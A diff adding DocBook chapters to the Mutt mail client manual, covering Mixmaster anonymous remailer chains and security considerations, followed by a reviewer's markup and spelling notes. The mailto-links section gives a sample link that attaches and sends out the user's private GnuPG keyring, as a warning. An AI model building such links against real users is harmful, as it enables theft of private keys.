+<sect1 id="sending-mixmaster">
+<title>Sending Anonymous Messages via Mixmaster</title>
+
+<para>
+You may also have compiled Mutt to co-operate with Mixmaster, an
+anonymous remailer. Mixmaster permits you to send your messages
+anonymously using a chain of remailers. Mixmaster support in Mutt is for
+mixmaster version 2.04 (beta 45 appears to be the latest) and 2.03.
+It does not support earlier versions or the later so-called version 3 betas,
+of which the latest appears to be called 2.9b23.
+</para>
+
+<para>
+To use it, you'll have to obey certain restrictions. Most
+important, you cannot use the <literal>Cc</literal> and <literal>Bcc</literal> headers. To tell
+Mutt to use mixmaster, you have to select a remailer chain, using
+the mix function on the compose menu.
+</para>
+
+<para>
+The chain selection screen is divided into two parts. In the
+(larger) upper part, you get a list of remailers you may use. In
+the lower part, you see the currently selected chain of remailers.
+</para>
+
+<para>
+You can navigate in the chain using the <literal><chain-prev></literal> and
+<literal><chain-next></literal> functions, which are by default bound to the left
+and right arrows and to the <literal>h</literal> and <literal>l</literal> keys (think vi
+keyboard bindings). To insert a remailer at the current chain
+position, use the <literal><insert></literal> function. To append a remailer behind
+the current chain position, use <literal><select-entry></literal> or <literal><append></literal>.
+You can also delete entries from the chain, using the corresponding
+function. Finally, to abandon your changes, leave the menu, or
+<literal><accept></literal> them pressing (by default) the <literal>Return</literal> key.
+</para>
+
+<para>
+Note that different remailers do have different capabilities,
+indicated in the %c entry of the remailer menu lines (see
+<link linkend="mix-entry-format">$mix_entry_format</link>). Most important is
+the <quote>middleman</quote> capability, indicated by a capital <quote>M</quote>: This
+means that the remailer in question cannot be used as the final
+element of a chain, but will only forward messages to other
+mixmaster remailers. For details on the other capabilities, please
+have a look at the mixmaster documentation.
+</para>
+
+</sect1>
+
+</chapter>
+
+<chapter id="security">
+<title>Security Considerations</title>
+
+<para>
+First of all, Mutt contains no security holes included by intention but
+may contain unknown security holes. As a consequence, please run Mutt
+only with as few permissions as possible. Especially, do not run Mutt as
+the super user.
+</para>
+
+<para>
+When configuring Mutt, there're some points to note about secure setups
+so please read this chapter carefully.
+</para>
+
+<sect1 id="security-passwords">
+<title>Passwords</title>
+
+<para>
+Although Mutt can be told the various passwords for accounts, please
+never store passwords in configuration files. Besides the fact that the
+system's operator can always read them, you could forget to mask it out
+when reporting a bug or asking for help via a mailing list. Even worse,
+your mail including your password could be archived by internet search
+engines, mail-to-news gateways etc. It may already be too late before
+you notice your mistake.
+</para>
+
+</sect1>
+
+<sect1 id="security-tempfiles">
+<title>Temporary Files</title>
+
+<para>
+Mutt uses many temporary files for viewing messages, verifying digital
+signatures, etc. As long as being used, these files are visible by other
+users and maybe even readable in case of misconfiguration. Also, a
+different location for these files may be desired which can be changed
+via the <link linkend="tmpdir">$tmpdir</link> variable.
+</para>
+
+</sect1>
+
+<sect1 id="security-leaks">
+<title>Information Leaks</title>
+
+<sect2 id="security-leaks-mid">
+<title>Message-Id: headers</title>
+
+<para>
+Message-Id: headers contain a local part that is to be created in a
+unique fashion. In order to do so, Mutt will <quote>leak</quote> some
+information to the outside world when sending messages: the generation
+of this header includes a step counter which is increased (and rotated)
+with every message sent. In a longer running mutt session, others can
+make assumptions about your mailing habbits depending on the number of
+messages sent. If this is not desired, the header can be manually
+provided using <link
+linkend="edit-headers">$edit_headers</link> (though not
+recommended).
+</para>
+
+</sect2>
+
+<sect2 id="security-leaks-mailto">
+<title><literal>mailto:</literal>-style Links</title>
+
+<para>
+As Mutt be can be set up to be the mail client to handle
+<literal>mailto:</literal> style links in websites, there're security
+considerations, too. Arbitrary header fields can be embedded in these
+links which could override existing header fields or attach arbitrary
+files using <link linkend="attach-header">the Attach:
+psuedoheader</link>. This may be problematic if the <link
+linkend="edit-headers">$edit-headers</link> variable is
+<emphasis>unset</emphasis>, i.e. the user doesn't want to see header
+fields while editing the message and doesn't pay enough attention to the
+compose menu's listing of attachments.
+</para>
+
+<para>
+For example, following a link like
+</para>
+
+<screen>
+mailto:joe@host?Attach=~/.gnupg/secring.gpg</screen>
+
+<para>
+will send out the user's private gnupg keyring to
+<literal>joe@host</literal> if the user doesn't follow the information
+on screen carefully enough.
+</para>
+
+</sect2>
+
+</sect1>
+
+<sect1 id="security-external">
+<title>External Applications</title>
+
+<para>
+Mutt in many places has to rely on external applications or for
+convenience supports mechanisms involving external applications.
+</para>
+
+<para>
+One of these is the <literal>mailcap</literal> mechanism as defined by
+RfC1524. Details about a secure use of the mailcap mechanisms is given
+in <xref linkend="secure-mailcap"/>.
+</para>
+
+<para>
+Besides the mailcap mechanism, Mutt uses a number of other external
+utilities for operation, for example to provide crypto support, in
+backtick expansion in configuration files or format string filters. The
+same security considerations apply for these as for tools involved via
+mailcap.
+</para>
+
+</sect1>
+
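Review bot: the function names in the chain-navigation paragraph of sending-mixmaster are written with raw angle brackets inside the literal element, e.g. <literal><chain-prev></literal>, and likewise for chain-next, insert, select-entry, append and accept. As written, an XML parser treats each one as an unclosed element and the manual is not well-formed; escape them as &lt;chain-prev&gt; and so on. In security-leaks-mailto the link text reads $edit-headers, while the Message-Id section uses $edit_headers for the same linkend="edit-headers"; make the two agree. Spelling to fix while here: "habbits", "psuedoheader", "Mutt be can be", "RfC1524".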